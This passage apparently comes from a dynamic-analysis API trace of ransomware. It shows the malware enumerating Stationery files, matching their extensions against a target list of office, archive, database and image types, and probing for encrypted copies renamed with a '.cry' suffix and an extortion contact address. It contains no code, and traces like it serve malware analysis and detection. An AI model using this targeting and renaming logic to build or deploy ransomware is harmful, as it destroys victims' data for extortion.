shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.630] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2920) returned 1 [0043.630] CloseHandle (hObject=0x164) returned 1 [0043.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0043.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.630] lstrlenW (lpString=".doc") returned 4 [0043.630] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0043.630] lstrlenW (lpString=".docx") returned 5 [0043.630] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0043.630] lstrlenW (lpString=".pdf") returned 4 [0043.630] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0043.630] lstrlenW (lpString=".xls") returned 4 [0043.630] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0043.630] lstrlenW (lpString=".xlsx") returned 5 [0043.630] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0043.630] lstrlenW (lpString=".ppt") returned 4 [0043.630] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0043.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.630] lstrlenW (lpString=".zip") returned 4 [0043.630] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0043.630] lstrlenW (lpString=".rar") returned 4 [0043.630] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0043.630] lstrlenW (lpString=".bz2") returned 4 [0043.631] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString=".7z") returned 3 [0043.631] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString=".dbf") returned 4 [0043.631] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString=".1cd") returned 4 [0043.631] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString=".jpg") returned 4 [0043.631] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString=".doc") returned 4 [0043.631] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString=".docx") returned 5 [0043.631] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0043.631] lstrlenW (lpString=".pdf") returned 4 [0043.631] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString=".xls") returned 4 [0043.631] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0043.631] lstrlenW (lpString=".xlsx") returned 5 [0043.631] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0043.631] lstrlenW (lpString=".ppt") returned 4 [0043.631] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.631] lstrlenW (lpString=".zip") returned 4 [0043.631] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0043.631] lstrlenW (lpString=".rar") returned 4 [0043.631] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0043.631] lstrlenW (lpString=".bz2") returned 4 [0043.632] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0043.632] lstrlenW (lpString=".7z") returned 3 [0043.632] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0043.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.632] lstrlenW (lpString=".dbf") returned 4 [0043.632] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0043.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.632] lstrlenW (lpString=".1cd") returned 4 [0043.632] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0043.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0043.632] lstrlenW (lpString=".jpg") returned 4 [0043.632] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0043.632] lstrcmpiW (lpString1=".wmf", lpString2=".cry") returned 1 [0043.632] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0043.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.632] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=7498) returned 1 [0043.632] CloseHandle (hObject=0x164) returned 1 [0043.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0043.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString=".doc") returned 4 [0043.633] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString=".docx") returned 5 [0043.633] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0043.633] lstrlenW (lpString=".pdf") returned 4 [0043.633] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString=".xls") returned 4 [0043.633] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0043.633] lstrlenW (lpString=".xlsx") returned 5 [0043.633] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0043.633] lstrlenW (lpString=".ppt") returned 4 [0043.633] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString=".zip") returned 4 [0043.633] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0043.633] lstrlenW (lpString=".rar") returned 4 [0043.633] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString=".bz2") returned 4 [0043.633] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString=".7z") returned 3 [0043.633] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString=".dbf") returned 4 [0043.633] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString=".1cd") returned 4 [0043.633] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.633] lstrlenW (lpString=".jpg") returned 4 [0043.633] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0043.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString=".doc") returned 4 [0043.634] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString=".docx") returned 5 [0043.634] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0043.634] lstrlenW (lpString=".pdf") returned 4 [0043.634] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString=".xls") returned 4 [0043.634] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0043.634] lstrlenW (lpString=".xlsx") returned 5 [0043.634] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0043.634] lstrlenW (lpString=".ppt") returned 4 [0043.634] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString=".zip") returned 4 [0043.634] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0043.634] lstrlenW (lpString=".rar") returned 4 [0043.634] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString=".bz2") returned 4 [0043.634] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString=".7z") returned 3 [0043.634] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString=".dbf") returned 4 [0043.634] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString=".1cd") returned 4 [0043.634] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0043.634] lstrlenW (lpString=".jpg") returned 4 [0043.634] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0043.634] lstrcmpiW (lpString1=".htm", lpString2=".cry") returned 1 [0043.635] lstrlenW (lpString="Hand Prints.htm") returned 15 [0043.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.636] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=235) returned 1 [0043.636] CloseHandle (hObject=0x164) returned 1 [0043.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0043.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.636] lstrlenW (lpString=".doc") returned 4 [0043.636] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.636] lstrlenW (lpString=".docx") returned 5 [0043.636] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.636] lstrlenW (lpString=".pdf") returned 4 [0043.636] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.636] lstrlenW (lpString=".xls") returned 4 [0043.636] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.636] lstrlenW (lpString=".xlsx") returned 5 [0043.636] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.636] lstrlenW (lpString=".ppt") returned 4 [0043.636] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.636] lstrlenW (lpString=".zip") returned 4 [0043.636] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.636] lstrlenW (lpString=".rar") returned 4 [0043.636] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.636] lstrlenW (lpString=".bz2") returned 4 [0043.636] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.636] lstrlenW (lpString=".7z") returned 3 [0043.636] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".dbf") returned 4 [0043.637] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".1cd") returned 4 [0043.637] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".jpg") returned 4 [0043.637] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".doc") returned 4 [0043.637] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.637] lstrlenW (lpString=".docx") returned 5 [0043.637] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.637] lstrlenW (lpString=".pdf") returned 4 [0043.637] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString=".xls") returned 4 [0043.637] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString=".xlsx") returned 5 [0043.637] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.637] lstrlenW (lpString=".ppt") returned 4 [0043.637] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".zip") returned 4 [0043.637] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString=".rar") returned 4 [0043.637] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.637] lstrlenW (lpString=".bz2") returned 4 [0043.637] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.637] lstrlenW (lpString=".7z") returned 3 [0043.637] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".dbf") returned 4 [0043.637] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.637] lstrlenW (lpString=".1cd") returned 4 [0043.638] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0043.638] lstrlenW (lpString=".jpg") returned 4 [0043.638] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.638] lstrcmpiW (lpString1=".jpg", lpString2=".cry") returned 1 [0043.638] lstrlenW (lpString="HandPrints.jpg") returned 14 [0043.638] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.638] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=4222) returned 1 [0043.638] CloseHandle (hObject=0x164) returned 1 [0043.638] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0043.638] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.638] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.638] lstrlenW (lpString=".doc") returned 4 [0043.638] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.638] lstrlenW (lpString=".docx") returned 5 [0043.638] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.638] lstrlenW (lpString=".pdf") returned 4 [0043.639] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".xls") returned 4 [0043.639] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".xlsx") returned 5 [0043.639] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.639] lstrlenW (lpString=".ppt") returned 4 [0043.639] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString=".zip") returned 4 [0043.639] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".rar") returned 4 [0043.639] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".bz2") returned 4 [0043.639] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.639] lstrlenW (lpString=".7z") returned 3 [0043.639] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString=".dbf") returned 4 [0043.639] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString=".1cd") returned 4 [0043.639] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString=".jpg") returned 4 [0043.639] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.639] lstrlenW (lpString=".doc") returned 4 [0043.639] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.639] lstrlenW (lpString=".docx") returned 5 [0043.639] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.639] lstrlenW (lpString=".pdf") returned 4 [0043.639] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".xls") returned 4 [0043.639] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.639] lstrlenW (lpString=".xlsx") returned 5 [0043.640] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.640] lstrlenW (lpString=".ppt") returned 4 [0043.640] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.640] lstrlenW (lpString=".zip") returned 4 [0043.640] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0043.640] lstrlenW (lpString=".rar") returned 4 [0043.640] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0043.640] lstrlenW (lpString=".bz2") returned 4 [0043.640] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0043.640] lstrlenW (lpString=".7z") returned 3 [0043.640] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0043.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.640] lstrlenW (lpString=".dbf") returned 4 [0043.640] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.640] lstrlenW (lpString=".1cd") returned 4 [0043.640] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0043.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0043.640] lstrlenW (lpString=".jpg") returned 4 [0043.640] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0043.640] lstrcmpiW (lpString1=".emf", lpString2=".cry") returned 1 [0043.640] lstrlenW (lpString="Memo.emf") returned 8 [0043.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0043.641] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=152300) returned 1 [0043.641] CloseHandle (hObject=0x164) returned 1 [0043.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0x20 [0043.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0043.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0043.641] lstrlenW (lpString=".doc") returned 4 [0043.641] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.641] lstrlenW (lpString=".docx") returned 5 [0043.641] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0043.642] lstrlenW (lpString=".pdf") returned 4 [0043.642] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.642] lstrlenW (lpString=".xls") returned 4 [0043.642] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.642] lstrlenW (lpString=".xlsx") returned 5 [0043.642] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0043.642] lstrlenW (lpString=".ppt") returned 4 [0043.642] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0043.642] lstrlenW (lpString=".zip") returned 4 [0043.642] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.642] lstrlenW (lpString=".rar") returned 4 [0043.642] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.642] lstrlenW (lpString=".bz2") returned 4 [0043.642] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.642] lstrlenW (lpString=".7z") returned 3 [0043.642] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0043.642] lstrlenW (lpString=".dbf") returned 4 [0043.642] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0043.659] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.659] 